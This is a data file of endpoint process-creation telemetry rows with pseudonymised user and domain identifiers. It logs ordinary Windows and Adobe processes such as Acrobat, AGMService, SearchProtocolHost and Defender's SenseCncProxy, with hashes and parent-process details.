+985,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:01.796016+00:00,15968,AcroCEF.exe,"""AcroCEF.exe"" --slMode",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,d4ebed1bb1cfb00171ce0cf6dbc4039b,f6b88a34e92155a3b9c1cc3aca24c56d62318b3ffb343025318bfdb5367b4e3c,da66d66d18c23a33e78d356b3b5be963c3e32dc9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:00:01.626329400+00:00,12112,acrobat_sl.exe,"""Acrobat_sl.exe"" ",False,2021-06-23 01:00:01.371987+00:00,2348,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:01.856772300+00:00,2021-06-23 01:00:53.295413600+00:00,b1c01d49-8608-4dab-a934-e9a2769b6e82,computerpii_0a470890c60768167990033d701e7bd881398861,155938,False,10.7740.19041.1052,False,11540474045172001,,11540474045172005,2021-06-23 01:00:01.626329400+00:00,12112,2021-06-23 01:00:01.626329400+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe,12112,18560,TerminateProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,24232,2021-02-02 03:38:39+00:00,2021-02-02 05:49:32+00:00,2021-06-23 01:00:01.618756+00:00,2021-02-02 05:49:32+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,5.0,1.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat,21.1.20135.421056,,AcroSpeedLaunch.exe,Adobe Acrobat SpeedLauncher,,,,,,
+986,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:01.986356600+00:00,9344,AcroRd32.exe,"""AcroRd32.exe"" --type=renderer /prefetch:1  /l /slMode",PortableExecutable,2021-05-28 05:58:48+00:00,C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe,3150048,3c9b885b579ebadaae15e391ac8313af,cf40670e0eb0629a0d51f65325c692788d0a5503dea3f13db643b916701ab1da,d75dea803685620b22514689e32c2287206dcc63,3c9b885b579ebadaae15e391ac8313af,cf40670e0eb0629a0d51f65325c692788d0a5503dea3f13db643b916701ab1da,d75dea803685620b22514689e32c2287206dcc63,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:00:01.631789600+00:00,4060,AcroRd32.exe,"""AcroRd32.exe"" /l /slMode",False,2021-06-23 01:00:01.614894700+00:00,16780,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:02.047706300+00:00,2021-06-23 01:00:53.296105300+00:00,580a9705-f830-47ca-96eb-3ee209683829,computerpii_0a470890c60768167990033d701e7bd881398861,155946,False,10.7740.19041.1052,False,11540474045172002,,11540474045172006,2021-06-23 01:00:01.631789600+00:00,4060,2021-06-23 01:00:01.631789600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe,4060,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader,3150048,2021-05-28 05:27:26+00:00,2021-05-28 05:58:48+00:00,2021-06-23 01:00:01.634382200+00:00,2021-05-28 05:58:48+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,128.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat Reader DC,21.5.20048.436468,,AcroRd32.exe,Adobe Acrobat Reader DC ,Adobe Systems Incorporated,Adobe Acrobat Reader DC,21.5.20048.436468,,AcroRd32.exe,Adobe Acrobat Reader DC
+987,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:02.070408900+00:00,19160,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_grqmcn 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:02.356858400+00:00,2021-06-23 01:00:53.296324600+00:00,0bbfc5e1-a4aa-4f98-ad22-6906fd3df075,computerpii_0a470890c60768167990033d701e7bd881398861,155949,False,10.7740.19041.1052,False,11540474045136991,,11540474045172007,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,18560,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+988,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:02.076792800+00:00,10868,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:00:02.070408900+00:00,19160,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_grqmcn 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:02.357169+00:00,2021-06-23 01:00:53.296390200+00:00,37b62791-ad0e-4c84-9c05-a78a86ac89c6,computerpii_0a470890c60768167990033d701e7bd881398861,155950,False,10.7740.19041.1052,False,11540474045172007,,11540474045172008,2021-06-23 01:00:02.070408900+00:00,19160,2021-06-23 01:00:02.070408900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,19160,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:46.229988300+00:00,2020-09-22 19:30:00+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+989,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:02.411845500+00:00,10536,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe628_ Global\UsGthrCtrlFltPipeMssGthrPipe628 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:02.756657400+00:00,2021-06-23 01:00:53.296906100+00:00,eb29d6df-4144-4a84-8820-bb664d70bcb4,computerpii_0a470890c60768167990033d701e7bd881398861,155958,False,10.7740.19041.1052,False,11540474045144190,,11540474045172009,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+990,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:03.078305+00:00,14812,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_jbksmo 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:03.119601900+00:00,2021-06-23 01:00:53.297365500+00:00,43a64adc-282a-4571-ae1b-a63ababa0f75,computerpii_0a470890c60768167990033d701e7bd881398861,155965,False,10.7740.19041.1052,False,11540474045136991,,11540474045172013,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,AGMService.exe,4496,2304,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+991,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:51:21.258434400+00:00,11356,upfc.exe,Upfc.exe /launchtype periodic /cv ZFIkgC4zJkO2Lw+b//i4Dg.0,PortableExecutable,2019-12-07 09:08:33.284887700+00:00,C:\Windows\System32\upfc.exe,121392,299ea296575ccb9d2c1a779062535d5c,ee44fe14df89c4e5eaf8398f8fb4823fd910c5a94d913653d6b9e831254f6cc2,2497169c13b0ba46a6be8a1fe493b250094079b7,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:51:21.505136800+00:00,2021-06-24 00:53:26.658349600+00:00,2b54f0b0-ab94-4fb2-9bf6-79f22649af41,computerpii_0a470890c60768167990033d701e7bd881398861,167545,False,10.7740.19041.1052,False,11540474045136906,,11540474045175091,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,UPFC,upfc.exe,Updateability From SCM
+992,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:51:21.266519900+00:00,16516,MicrosoftEdgeUpdate.exe,"""MicrosoftEdgeUpdate.exe"" /ua /installsource scheduler",PortableExecutable,2020-09-27 14:36:21.069830800+00:00,C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe,213392,b55ad19c6c110e9bf985bc8674f7bcb3,9991ba022173f283ee99068b708f60ac5143fe0c81c9e3673cc7835b108a4f44,accd3e9360bb920985f1a42ee00eda43cf6405e9,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:51:21.512020500+00:00,2021-06-24 00:53:26.658480400+00:00,7407df25-8ef7-40c5-94d1-a280e9c085e1,computerpii_0a470890c60768167990033d701e7bd881398861,167548,False,10.7740.19041.1052,False,11540474045136925,,11540474045175092,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Edge Update,1.3.133.5,Microsoft Edge Update,msedgeupdate.dll,Microsoft Edge Update
+993,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:51:21.286732200+00:00,16488,taskhostw.exe,taskhostw.exe SYSTEM,PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:51:21.516464800+00:00,2021-06-24 00:53:26.658574600+00:00,247fbd43-deb3-4260-82d5-314b0cc99927,computerpii_0a470890c60768167990033d701e7bd881398861,167550,False,10.7740.19041.1052,False,11540474045136925,,11540474045175094,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+994,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:56:51.467581+00:00,9324,SenseCncProxy.exe,3816,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:56:51.997799400+00:00,2021-06-25 00:57:53.253075800+00:00,25960425-bb1b-4d6b-bda3-2484f9fe2b55,computerpii_0a470890c60768167990033d701e7bd881398861,182208,False,10.7740.19041.1052,False,11540474045137006,,11540474045178532,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+995,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:17.314109+00:00,21452,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Aplha Node Limited\KYB\FilePII_edd840c5ba4793ec460b8655ad56cb3a92e86a66.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:00.068282600+00:00,15164,explorer.exe,Explorer.EXE,False,2021-06-25 00:38:59.791718800+00:00,20356,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:17.423902100+00:00,2021-06-25 00:57:53.256470+00:00,a0ce02fd-b726-4392-8778-79f8bc4a4f57,computerpii_0a470890c60768167990033d701e7bd881398861,182250,False,10.7740.19041.1052,False,11540474045178163,,11540474045178537,2021-06-25 00:39:00.068282600+00:00,15164,2021-06-25 00:39:00.068282600+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,15164,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-25 00:39:00.076466400+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,20481.0,1.0,1025.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+996,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:17.847820200+00:00,13776,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320843_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320843 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 